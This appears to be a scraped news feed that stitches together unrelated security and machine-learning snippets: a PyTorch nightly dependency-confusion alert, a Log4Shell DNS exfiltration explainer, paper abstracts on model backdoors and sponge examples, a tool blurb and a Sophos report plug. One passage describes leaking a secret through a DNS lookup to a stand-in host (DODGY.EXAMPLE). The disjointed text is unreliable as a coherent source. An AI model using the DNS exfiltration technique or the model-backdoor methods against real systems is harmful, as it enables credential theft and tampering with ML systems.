Security News
The maintainers of the PyTorch package have warned users who have installed the nightly builds of the library between December 25, 2022, and December 30, 2022, to uninstall and download the latest versions following a dependency confusion attack. "PyTorch-nightly Linux packages installed via pip during that time installed a dependency, torchtriton, which was compromised on the Python Package Index code repository and ran a malicious binary," the PyTorch team said in an alert over the weekend.
So what looked like an innocent, if pointless, DNS lookup for a "Server" such as S3CR3TPA55W0RD.DODGY.EXAMPLE would quietly leak your access key under the guise of a simple lookup that directed to the official DNS server listed for the DODGY.EXAMPLE domain. LIVE LOG4SHELL DEMO EXPLAINING DATA EXFILTRATION VIA DNS. If you can't read the text clearly here, try using Full Screen mode, or watch directly on YouTube.
An open-source smart data exploration, analysis and model debugging tool for machine learning. Data scientists often need to analyze datasets both during the data preparation stage and model training, which can be overwhelming and time-consuming, especially when working on large-scale datasets.
Abstract: Early backdoor attacks against machine learning set off an arms race in attack and defence development. Defences have since appeared demonstrating some ability to detect backdoors in models or even remove them.
Very few organizations are focusing on protecting their machine learning assets and even fewer are allocating resources to machine learning security. The advantages are proven, but as we've seen with other new technologies, they quickly become a new attack surface for malicious actors.
While such devices enable us to train large-scale neural networks in datacenters and deploy them on edge devices, their designers' focus so far is on average-case performance. We show how adversaries can exploit carefully-crafted sponge examples, which are inputs designed to maximise energy consumption and latency, to drive machine learning systems towards their worst-case performance.
Most deep neural networks are trained by stochastic gradient descent. Now "Stochastic" is a fancy Greek word for "Random"; it means that the training data are fed into the model in random order.
Network traffic continues to increase, and global internet bandwidth grew by 29% in 2021, reaching 786 Tbps. In addition to record traffic volumes, 95% of traffic is now encrypted according to Google. To help address these problems, many network security and operations teams are relying more heavily on machine learning technologies to identify faults, anomalies, and threats in network traffic.
Abstract: Given the computational cost and technical expertise required to train machine learning models, users may delegate the task of learning to a service provider. We show how a malicious learner can plant an undetectable backdoor into a classifier.
The report isn't just one researcher's work, or even one department's work, but the combined effort of SophosLabs, Sophos Managed Threat Response, Sophos Rapid Response, and Sophos Artificial Intelligence. Don't take Joe's word for it read the report and see how we live up to those three principles!